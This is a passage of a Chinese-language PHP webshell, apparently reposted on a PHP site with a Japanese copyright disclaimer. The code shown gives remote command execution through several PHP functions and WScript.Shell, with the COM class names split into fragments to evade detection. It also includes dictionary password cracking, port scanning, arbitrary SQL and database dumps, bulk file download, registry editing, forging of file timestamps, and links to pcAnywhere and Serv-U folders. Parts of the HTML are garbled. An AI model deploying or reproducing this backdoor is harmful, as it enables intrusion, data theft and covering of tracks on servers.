                    $t = "获取".$user."的密码为".$tmp[$i].""; 
                    } 
            } 
            if(!$t){ 
                echo
 "<meta http-equiv=\"refresh\" 
content=\"".$admin[jumpsecond].";URL=".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&ctype=".$ctype."\"><span
 style="\" style="\""font-size: 12px; font-family: Verdana\"><a 
href="\" 
href="\""".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&type=".$ctype."\">字典总共".$count."个,现在从".$first."到".$now.",".$admin[jumpsecond]."秒后进行这".$onetime."个密码的试探.
 
>>></a><br>全历此次".$type."的破解需要".$tt."次,现在是第".$turn."次解密。</span>"; 
    } 
    else { 
        echo"$t"; 
        } 
            } 
}else{ 
            echo"字典文件不存在,请确定。"; 
            } 
} 
elseif($do ==&#39;port&#39;){ 
    if(!eregi("-",$port)){ 
        $tmp = explode(",",$port); 
        $count = count($tmp); 
        $first = "1"; 
    }else{ 
        $tmp = explode("-",$port); 
        $first = $tmp[0]; 
        $count = $tmp[1]; 

    } 
    for($i=$first;$i<$count;$i++){ 
            if(!eregi("-",$port)){ 
            $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); 
            if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."<br>"; 
            }else{ 
                $fp = @fsockopen($host, $i, $errno, $errstr, 1); 
                if($fp) echo"发现".$host."主机打开了端口".$i."<br>"; 
            } 
        } 

    } 
// 连接MYSQL 
elseif ($connect) { 
    if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { 
        echo "数据库连接成功!"; 
        mysql_close(); 
    } else { 
        echo mysql_error(); 
    } 
} 

// 执行SQL语句 
elseif ($_POST[&#39;do&#39;] == &#39;query&#39;) { 
    @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); 
    @mysql_select_db($dbname) or die("选择数据库失败"); 
    $result = @mysql_query($_POST[&#39;sql_query&#39;]); 
    echo ($result) ? "SQL语句成功执行!" : "出错: ".mysql_error(); 
    mysql_close(); 
} 

// 备份操作 
elseif ($_POST[&#39;do&#39;] == &#39;backupmysql&#39;) { 
    if (empty($_POST[&#39;table&#39;]) OR empty($_POST[&#39;backuptype&#39;])) { 
        echo "请选择欲备份的数据表和备份方式!"; 
    } else { 
        if ($_POST[&#39;backuptype&#39;] == &#39;server&#39;) { 
            @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); 
            @mysql_select_db($dbname) or die("选择数据库失败");     
            $table = array_flip($_POST[&#39;table&#39;]); 
            $filehandle = @fopen($path,"w"); 
            if ($filehandle) { 
                $result = mysql_query("SHOW tables"); 
                echo ($result) ? NULL : "出错: ".mysql_error(); 
                while ($currow = mysql_fetch_array($result)) { 
                    if (isset($table[$currow[0]])) { 
                        sqldumptable($currow[0], $filehandle); 
                        fwrite($filehandle,"\n\n\n"); 
                    } 
                } 
                fclose($filehandle); 
                echo "数据库已成功备份到 <a href="\" href="\""".$path."\" target=\"_blank\">".$path."</a>"; 
                mysql_close(); 
            } else { 
                echo "备份失败,请确认目标文件夹是否具有可写权限!"; 
            } 
        } 
    } 
} 
elseif($downrar) { 
    if (!empty($dl)) { 
        if(eregi("unzipto:",$localfile)){ 
        $path = "".$dir."/".str_replace("unzipto:","",$localfile).""; 
        $zip = new Zip; 
        $zipfile=$dir."/".$dl[0]; 
        $array=$zip->get_list($zipfile); 
        $count=count($array); 
        $f=0; 
        $d=0; 
        for($i=0;$i<$count;$i++) { 
            if($array[$i][folder]==0) { 
                if($zip->Extract($zipfile,$path,$i)>0) $f++; 
            } 
            else $d++; 
        } 
        if($i==$f+$d) echo "$dl[0] 解压到".$path."成功<br>($f 个文件 $d 个目录)"; 
        elseif($f==0) echo "$dl[0] 解压到".$path."失败"; 
        else echo "$dl[0] 未解压完整<br>(已解压 $f 个文件 $d 个目录)"; 
        }else{ 
    $zipfile=""; 
    $zip = new Zip; 
    for($k=0;isset($dl[$k]);$k++) 
        { 
            $zipfile=$dir."/".$dl[$k]; 
            if(is_dir($zipfile)) 
            { 
                unset($zipfilearray); 
                addziparray($dl[$k]); 
                for($i=0;$zipfilearray[$i];$i++) 
                { 
                    $filename=$zipfilearray[$i]; 
                    $filesize=@filesize($dir."/".$zipfilearray[$i]); 
                    $fp=@fopen($dir."/".$filename,rb); 
                    $zipfiles[]=Array($filename,@fread($fp,$filesize)); 
                    @fclose($fp); 
                } 
            } 
            else 
            { 
                $filename=$dl[$k]; 
                $filesize=@filesize($zipfile); 
                $fp=@fopen($zipfile,rb); 
                $zipfiles[]=Array($filename,@fread($fp,$filesize)); 
                @fclose($fp); 
            } 
        } 
        $zip->Add($zipfiles,1); 
        $code = $zip->get_file(); 
        $ck = "_QQ44997_".date("Y-m-d",time()).""; 
        if(empty($localfile)){ 
        header("Content-type: application/octet-stream"); 
        header("Accept-Ranges: bytes"); 
        header("Accept-Length: ".strlen($code)); 
        header("Content-Disposition: attachment;filename=".$_SERVER[&#39;HTTP_HOST&#39;]."".$ck."_Files.zip"); 
        echo $code; 
        exit; 
        }else{ 
         $fp = @fopen("".$dir."/".$localfile."","w"); 
         echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功!!" : "目录".$dir."无可写权限!"; 
         @fclose($fp); 
        } 
        } 
    } else { 
        echo "请选择要打包下载的文件!"; 
    } 
} 
// Shell.Application 运行程序 
elseif(($_POST[&#39;do&#39;] == &#39;programrun&#39;) AND !empty($_POST[&#39;program&#39;])) { 
    $shell= &new COM(&#39;Sh&#39;.&#39;el&#39;.&#39;l.Appl&#39;.&#39;ica&#39;.&#39;tion&#39;); 
    $a = $shell->ShellExecute($_POST[&#39;program&#39;],$_POST[&#39;prog&#39;]); 
    echo ($a==&#39;0&#39;) ? "程序已经成功执行!" : "程序运行失败!"; 
} 
// 查看PHP配置参数状况 
elseif(($_POST[&#39;do&#39;] == &#39;viewphpvar&#39;) AND !empty($_POST[&#39;phpvarname&#39;])) { 
    echo "配置参数 ".$_POST[&#39;phpvarname&#39;]." 检测结果: ".getphpcfg($_POST[&#39;phpvarname&#39;]).""; 
} 
// 读取注册表 
elseif(($regread) AND !empty($_POST[&#39;readregname&#39;])) { 
    $shell= &new COM(&#39;WSc&#39;.&#39;rip&#39;.&#39;t.Sh&#39;.&#39;ell&#39;); 
    var_dump(@$shell->RegRead($_POST[&#39;readregname&#39;])); 
} 

// 写入注册表 
elseif(($regwrite) AND !empty($_POST[&#39;writeregname&#39;]) AND !empty($_POST[&#39;regtype&#39;]) AND !empty($_POST[&#39;regval&#39;])) { 
    $shell= &new COM(&#39;W&#39;.&#39;Scr&#39;.&#39;ipt.S&#39;.&#39;hell&#39;); 
    $a = @$shell->RegWrite($_POST[&#39;writeregname&#39;], $_POST[&#39;regval&#39;], $_POST[&#39;regtype&#39;]); 
    echo ($a==&#39;0&#39;) ? "写入注册表健值成功!" : "写入 ".$_POST[&#39;regname&#39;].", ".$_POST[&#39;regval&#39;].", ".$_POST[&#39;regtype&#39;]." 失败!"; 
} 
// 删除注册表 
elseif(($regdelete) AND !empty($_POST[&#39;delregname&#39;])) { 
    $shell= &new COM(&#39;WS&#39;.&#39;cri&#39;.&#39;pt.S&#39;.&#39;he&#39;.&#39;ll&#39;); 
    $a = @$shell->RegDelete($_POST[&#39;delregname&#39;]); 
    echo ($a==&#39;0&#39;) ? "删除注册表健值成功!" : "删除 ".$_POST[&#39;delregname&#39;]." 失败!"; 
} 
else { 
    echo "$notice"; 
    echo
 "<a href="\" 
href="\""?dir=C:/Program%20Files/\">Program</a> | <a 
href="\" 
href="\""?dir=C:/Documents%20and%20Settings/All%20Users/Application%20Data/Symantec/pcAnywhere\">pcAnywhere</a>
 | <a href="\" 
href="\""?dir=C:/Documents%20and%20Settings/All%20Users/「开始」菜单/程序\">开始程序</a>
 | <a href="\" 
href="\""?dir=C:/Documents%20and%20Settings/All%20Users\">AllUsers</a>
 | <a href="\" href="\""?dir=C:/Program 
Files/RhinoSoft.com/Serv-U\">Serv-U</a> | "; 
    for ($i=66;$i<=90;$i++){$drive= chr($i).&#39;:&#39;; 
if
 (is_dir($drive."/")){$vol=shelL("vol 
$drive");if(empty($vol))$vol=$drive;echo " <a title=\"$drive/\" 
href="\" href="\""?dir=$drive/\">$drive\\</a>";} 
} 

} 
echo "</b></p>\n"; 
/*===================== 执行操作 结束 =====================*/ 
if (!isset($_GET[&#39;action&#39;]) OR empty($_GET[&#39;action&#39;]) OR ($_GET[&#39;action&#39;] == "dir")) { 
    $tb->tableheader(); 
?> 
<tr bgcolor="#cccccc"> 
<td align="center" nowrap width="27%"><b>文件</b></td> 
    <td align="center" nowrap width="16%"><b>创建日期</b></td> 
<td align="center" nowrap width="16%"><b>最后修改</b></td> 
<td align="center" nowrap width="11%"><b>大小</b></td> 
<td align="center" nowrap width="6%"><b>属性</b></td> 
<td align="center" nowrap width="24%"><b>操作</b></td> 
</tr> 
<FORM action="" method="POST"> 
<?php 
// 目录列表 
$dirs=@opendir($dir); 
$dir_i = &#39;0&#39;; 
while ($file=@readdir($dirs)) { 
    $filepath="$dir/$file"; 
    $a=@is_dir($filepath); 
    if($a=="1"){ 
        if($file!=".." && $file!=".")    { 
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); 
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); 
            $dirperm=substr(base_convert(fileperms($filepath),10,8),-4); 
            echo "<tr class=".getrowbg().">\n"; 
            echo
 " <td style="\" style="\""padding-left: 5px;\"><INPUT 
type=checkbox value=$file name=dl[]> [<a href="\" 
href="\""?dir=".urlencode($dir)."/".urlencode($file)."\"><font 
color=\"#006699\">$file</font></a>]</td>\n"; 
            echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n"; 
            echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n"; 
            echo
 " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" 
href="\""?action=search&dir=".$filepath."\">Search</a></td>\n"; 
            echo " <td align=\"center\" nowrap 
class=\"smlfont\"><a href="\" 
href="\""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n"; 
            echo " <td align=\"center\" nowrap>| <a 
href="\" href="\""#\" 
onclick=\"really(&#39;".urlencode($dir)."&#39;,&#39;".urlencode($file)."&#39;,&#39;你确定要删除 
$file 目录吗? \\n\\n如果该目录非空,此次操作将会删除该目录下的所有文件!&#39;,&#39;1&#39;)\">删除</a> | 
<a href="\" 
href="\""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."\">改名</a>
 |</td>\n"; 
            echo "</tr>\n"; 
            $dir_i++; 
        } else { 
            if($file=="..") { 
                echo "<tr class=".getrowbg().">\n"; 
                echo
 " <td nowrap colspan=\"6\" style="\" style="\""padding-left: 
5px;\"><a href="\" 
href="\""?dir=".urlencode($dir)."/".urlencode($file)."\">返回上级目录</a></td>\n"; 
                echo "</tr>\n"; 
            } 
        } 
    } 
}// while 
@closedir($dirs); 
?> 
<tr bgcolor="#cccccc"> 
<td colspan="6" height="5"></td> 
</tr> 
<? 
// 文件列表 
$dirs=@opendir($dir); 
$file_i = &#39;0&#39;; 
while ($file=@readdir($dirs)) { 
    $filepath="$dir/$file"; 
    $a=@is_dir($filepath); 
    if($a=="0"){         
        $size=@filesize($filepath); 
        $size=$size/1024 ; 
        $size= @number_format($size, 3); 
        if (@filectime($filepath) == @filemtime($filepath)) { 
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); 
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); 
        } else { 
            $ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>"; 
            $mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>"; 
        } 
        @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); 
        echo "<tr class=".getrowbg().">\n"; 
        echo " <td style="\" style="\""padding-left: 5px;\">"; 
        echo "<INPUT type=checkbox value=$file name=dl[]>"; 
        echo "<a href="\" href="\""$filepath\" target=\"_blank\">$file</a></td>\n"; 
        echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n"; 
        echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n"; 
        echo
 " <td align=\"right\" nowrap class=\"smlfont\"><span 
class=\"redfont\">$size</span> KB</td>\n"; 
        echo
 " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" 
href="\""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n"; 
        echo " <td align=\"center\" nowrap><a href="\" 
href="\""?downfile=".urlencode($filepath)."\">下载</a> | <a 
href="\" 
href="\""?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a>
 | <a href="\" href="\""#\" 
onclick=\"really(&#39;".urlencode($dir)."&#39;,&#39;".urlencode($filepath)."&#39;,&#39;你确定要删除
 $file 文件吗?&#39;,&#39;2&#39;)\">删除</a> | <a href="\" 
href="\""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">改名</a>
 | <a href="\" 
href="\""?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">时间</a></td>\n"; 
        echo "</tr>\n"; 
        $file_i++; 
    } 
}// while 
@closedir($dirs); 
if(get_cfg_var(&#39;safemode&#39;))$z
 = "<a href="\" href="\""#\" title=\"使用说明\" 
onclick=\"alert(&#39;Php为安全模式尽量少打包内容以免脚本超时\\n\\n填写文件名则把文件保存在本地方便操作,不填则直接下载。&#39;)\">(?)</a>"; 
else $z = "<a href="\" href="\""#\" title=\"使用说明\" 
onclick=\"alert(&#39;Php运行非安全模式,打包大件请等啊等啊等啊等\\n\\n填写文件名则把文件保存在本地方便操作,不填则直接下载。&#39;)\">(?)</a>"; 
$tb->tdbody(&#39;<table width="100%" border="0" cellpadding="2" 
cellspacing="0" 
align="center"><tr><td>&#39;.$tb->makeinput(&#39;chkall&#39;,&#39;on&#39;,&#39;onclick="CheckAll(this.form)"&#39;,&#39;checkbox&#39;,&#39;30&#39;,&#39;&#39;).&#39;
 
本地文件:&#39;.$tb->makeinput(&#39;localfile&#39;,&#39;&#39;,&#39;&#39;,&#39;text&#39;,&#39;15&#39;).&#39;&#39;.$tb->makeinput(&#39;downrar&#39;,&#39;选中打包下载或本地保存&#39;,&#39;&#39;,&#39;submit&#39;).&#39;
 &#39;.$z.&#39;</td><td align="right">&#39;.$dir_i.&#39; 个目录 / &#39;.$file_i.&#39; 
个文件</td></tr></table>&#39;,&#39;center&#39;,getrowbg(),&#39;&#39;,&#39;&#39;,&#39;6&#39;); 

echo "</FORM>\n"; 
echo "</table>\n"; 
}// end dir 

elseif ($_GET[&#39;action&#39;] == "editfile") { 
    if(empty($newfile)) { 
        $filename="$dir/$editfile"; 
        $fp=@fopen($filename,"r"); 
        $contents=@fread($fp, filesize($filename)); 
        @fclose($fp); 
        $contents=htmlspecialchars($contents); 
    }else{ 
        $editfile=$newfile; 
        $filename = "$dir/$editfile"; 
    } 
    $action = "?dir=".urlencode($dir)."&editfile=".$editfile; 
    $tb->tableheader(); 
    $tb->formheader($action,&#39;新建/编辑文件&#39;); 
    $tb->tdbody(&#39;当前文件:
 &#39;.$tb->makeinput(&#39;editfilename&#39;,$filename).&#39; 输入新文件名则建立新文件 Php代码加密: 
<input type="checkbox" name="change" value="yes" 
onclick="javascript:alert(\&#39;这个功能只可以用来加密或是压缩完整的php代码。\\n\\n非php代码或不完整php代码或不支持gzinflate函数请不要使用!\&#39;)">
 &#39;); 
    $tb->tdbody($tb->maketextarea(&#39;filecontent&#39;,$contents)); 
    $tb->makehidden(&#39;do&#39;,&#39;doeditfile&#39;); 
    $tb->formfooter(&#39;1&#39;,&#39;30&#39;); 
}//end editfile 

elseif ($_GET[&#39;action&#39;] == "rename") { 
    $nowfile = (isset($_POST[&#39;newname&#39;])) ? $_POST[&#39;newname&#39;] : basename($_GET[&#39;fname&#39;]); 
    $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname); 
    $tb->tableheader(); 
    $tb->formheader($action,&#39;修改文件名&#39;); 
    $tb->makehidden(&#39;oldname&#39;,$dir."/".$nowfile); 
    $tb->makehidden(&#39;dir&#39;,$dir); 
    $tb->tdbody(&#39;当前文件名: &#39;.basename($nowfile)); 
    $tb->tdbody(&#39;改名为: &#39;.$tb->makeinput(&#39;newname&#39;)); 
    $tb->makehidden(&#39;do&#39;,&#39;rename&#39;); 
    $tb->formfooter(&#39;1&#39;,&#39;30&#39;); 
}//end rename 

elseif ($_GET[&#39;action&#39;] == "eval") { 
    $action = "?dir=".urlencode($dir).""; 
    $tb->tableheader(); 
    $tb->formheader(&#39;&#39;.$action.&#39; "target="_blank&#39; ,&#39;执行php脚本&#39;); 
    $tb->tdbody($tb->maketextarea(&#39;phpcode&#39;,$contents)); 
    $tb->formfooter(&#39;1&#39;,&#39;30&#39;); 

} 
elseif ($_GET[&#39;action&#39;] == "fileperm") { 
    $action = "?dir=".urlencode($dir)."&file=".$file; 
    $tb->tableheader(); 
    $tb->formheader($action,&#39;修改文件属性&#39;); 
    $tb->tdbody(&#39;修改
 &#39;.$file.&#39; 的属性为: 
&#39;.$tb->makeinput(&#39;fileperm&#39;,substr(base_convert(fileperms($dir.&#39;/&#39;.$file),10,8),-4))); 
    $tb->makehidden(&#39;file&#39;,$file); 
    $tb->makehidden(&#39;dir&#39;,urlencode($dir)); 
    $tb->makehidden(&#39;do&#39;,&#39;editfileperm&#39;); 
    $tb->formfooter(&#39;1&#39;,&#39;30&#39;); 
}//end fileperm 

elseif ($_GET[&#39;action&#39;] == "newtime") { 
    $action = "?dir=".urlencode($dir); 
    $cachemonth
 = 
array(&#39;January&#39;=>1,&#39;February&#39;=>2,&#39;March&#39;=>3,&#39;April&#39;=>4,&#39;May&#39;=>5,&#39;June&#39;=>6,&#39;July&#39;=>7,&#39;August&#39;=>8,&#39;September&#39;=>9,&#39;October&#39;=>10,&#39;November&#39;=>11,&#39;December&#39;=>12); 
    $tb->tableheader(); 
    $tb->formheader($action,&#39;克隆文件最后修改时间&#39;); 
    $tb->tdbody("修改文件:
 ".$tb->makeinput(&#39;curfile&#39;,$file,&#39;readonly&#39;)." → 目标文件: 
".$tb->makeinput(&#39;tarfile&#39;,&#39;需填完整路径及文件名&#39;),&#39;center&#39;,&#39;2&#39;,&#39;30&#39;); 
    $tb->makehidden(&#39;do&#39;,&#39;domodtime&#39;); 
    $tb->formfooter(&#39;&#39;,&#39;30&#39;); 
    $tb->formheader($action,&#39;自定义文件最后修改时间&#39;); 
    $tb->tdbody(&#39;<br><ul><li>有效的时间戳典型范围是从格林威治时间
 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 
03:14:07<br>(该日期根据 32 位有符号整数的最小值和最大值而来)</li><li>说明: 日取
 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 
之间!</li></ul>&#39;,&#39;left&#39;); 
    $tb->tdbody(&#39;当前文件名: &#39;.$file); 
    $tb->makehidden(&#39;curfile&#39;,$file); 
    $tb->tdbody(&#39;修改为:
 &#39;.$tb->makeinput(&#39;year&#39;,&#39;1984&#39;,&#39;&#39;,&#39;text&#39;,&#39;4&#39;).&#39; 年 
&#39;.$tb->makeselect(array(&#39;name&#39;=>&#39;month&#39;,&#39;option&#39;=>$cachemonth,&#39;selected&#39;=>&#39;October&#39;)).&#39;
 月 &#39;.$tb->makeinput(&#39;data&#39;,&#39;18&#39;,&#39;&#39;,&#39;text&#39;,&#39;2&#39;).&#39; 日 
&#39;.$tb->makeinput(&#39;hour&#39;,&#39;20&#39;,&#39;&#39;,&#39;text&#39;,&#39;2&#39;).&#39; 时 
&#39;.$tb->makeinput(&#39;minute&#39;,&#39;00&#39;,&#39;&#39;,&#39;text&#39;,&#39;2&#39;).&#39; 分 
&#39;.$tb->makeinput(&#39;second&#39;,&#39;00&#39;,&#39;&#39;,&#39;text&#39;,&#39;2&#39;).&#39; 
秒&#39;,&#39;center&#39;,&#39;2&#39;,&#39;30&#39;); 
    $tb->makehidden(&#39;do&#39;,&#39;modmytime&#39;); 
    $tb->formfooter(&#39;1&#39;,&#39;30&#39;); 
}//end newtime 

elseif ($_GET[&#39;action&#39;] == "shell") { 
    $action = "??action=shell&dir=".urlencode($dir); 
    $tb->tableheader(); 
    $tb->tdheader(&#39;WebShell Mode&#39;); 
if (substr(PHP_OS, 0, 3) == &#39;WIN&#39;) { 
        $program = isset($_POST[&#39;program&#39;]) ? $_POST[&#39;program&#39;] : "c:\winnt\system32\cmd.exe"; 
        $prog = isset($_POST[&#39;prog&#39;]) ? $_POST[&#39;prog&#39;] : "/c net start > ".$pathname."/log.txt"; 
        echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n"; 
        $tb->tdbody(&#39;无回显运行程序
 → 文件: &#39;.$tb->makeinput(&#39;program&#39;,$program).&#39; 参数: 
&#39;.$tb->makeinput(&#39;prog&#39;,$prog,&#39;&#39;,&#39;text&#39;,&#39;40&#39;).&#39; 
&#39;.$tb->makeinput(&#39;&#39;,&#39;Run&#39;,&#39;&#39;,&#39;submit&#39;),&#39;center&#39;,&#39;2&#39;,&#39;35&#39;); 
        $tb->makehidden(&#39;do&#39;,&#39;programrun&#39;); 
        echo "</form>\n"; 
    } 
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n"; 
if(isset($_POST[&#39;cmd&#39;])) $cmd = $_POST[&#39;cmd&#39;]; 
    $tb->tdbody(&#39;提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容. &#39;); 
    $tb->tdbody(&#39;proc_open函数假设不是默认的winnt系统请自行设置使用,自行修改记得写退出,否则会在主机上留下一个未结束的进程.&#39;); 
    $tb->tdbody(&#39;proc_open函数要使用的cmd程序的位置:&#39;.$tb->makeinput(&#39;cmd&#39;,$cmd,&#39;&#39;,&#39;text&#39;,&#39;30&#39;).&#39;(要是是linux系统还是大大们自己修改吧)&#39;); 
$execfuncs
 = (substr(PHP_OS, 0, 3) == &#39;WIN&#39;) ? 
array(&#39;system&#39;=>&#39;system&#39;,&#39;passthru&#39;=>&#39;passthru&#39;,&#39;exec&#39;=>&#39;exec&#39;,&#39;shell_exec&#39;=>&#39;shell_exec&#39;,&#39;popen&#39;=>&#39;popen&#39;,&#39;wscript&#39;=>&#39;Wscript.Shell&#39;,&#39;proc_open&#39;=>&#39;proc_open&#39;)
 : 
array(&#39;system&#39;=>&#39;system&#39;,&#39;passthru&#39;=>&#39;passthru&#39;,&#39;exec&#39;=>&#39;exec&#39;,&#39;shell_exec&#39;=>&#39;shell_exec&#39;,&#39;popen&#39;=>&#39;popen&#39;,&#39;proc_open&#39;=>&#39;proc_open&#39;); 
$tb->tdbody(&#39;选择执行函数: 
&#39;.$tb->makeselect(array(&#39;name&#39;=>&#39;execfunc&#39;,&#39;option&#39;=>$execfuncs,&#39;selected&#39;=>$execfunc)).&#39;
 输入命令: &#39;.$tb->makeinput(&#39;command&#39;,$_POST[&#39;command&#39;],&#39;&#39;,&#39;text&#39;,&#39;60&#39;).&#39;
 &#39;.$tb->makeinput(&#39;&#39;,&#39;Run&#39;,&#39;&#39;,&#39;submit&#39;)); 
?> 
<tr class="secondalt"> 
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php 
    if (!empty($_POST[&#39;command&#39;])) { 
        if ($execfunc=="system") { 
            system($_POST[&#39;command&#39;]); 
        } elseif ($execfunc=="passthru") { 
            passthru($_POST[&#39;command&#39;]); 
        } elseif ($execfunc=="exec") { 
            $result = exec($_POST[&#39;command&#39;]); 
            echo $result; 
        } elseif ($execfunc=="shell_exec") { 
            $result=shell_exec($_POST[&#39;command&#39;]); 
            echo $result;     
        } elseif ($execfunc=="popen") { 
            $pp = popen($_POST[&#39;command&#39;], &#39;r&#39;); 
            $read = fread($pp, 2096); 
            echo $read; 
            pclose($pp); 
        } elseif ($execfunc=="wscript") { 
            $wsh = new COM(&#39;W&#39;.&#39;Scr&#39;.&#39;ip&#39;.&#39;t.she&#39;.&#39;ll&#39;) or die("PHP Create COM WSHSHELL failed"); 
            $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST[&#39;command&#39;].""); 
            $stdout = $exec->StdOut(); 
            $stroutput = $stdout->ReadAll(); 
            echo $stroutput; 
        } elseif($execfunc=="proc_open"){ 
$descriptorspec = array( 
0 => array("pipe", "r"), 
1 => array("pipe", "w"), 
2 => array("pipe", "w") 
); 
$process = proc_open("".$_POST[&#39;cmd&#39;]."", $descriptorspec, $pipes); 
if (is_resource($process)) { 

// 写命令 
fwrite($pipes[0], "".$_POST[&#39;command&#39;]."\r\n"); 
fwrite($pipes[0], "exit\r\n"); 
fclose($pipes[0]); 
// 读取输出 
while (!feof($pipes[1])) { 
echo fgets($pipes[1], 1024); 
} 
fclose($pipes[1]); 
while (!feof($pipes[2])) { 
echo fgets($pipes[2], 1024); 
} 
fclose($pipes[2]); 

proc_close($process); 
} 
        } else { 
            system($_POST[&#39;command&#39;]); 
        } 
    } 
    ?>
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。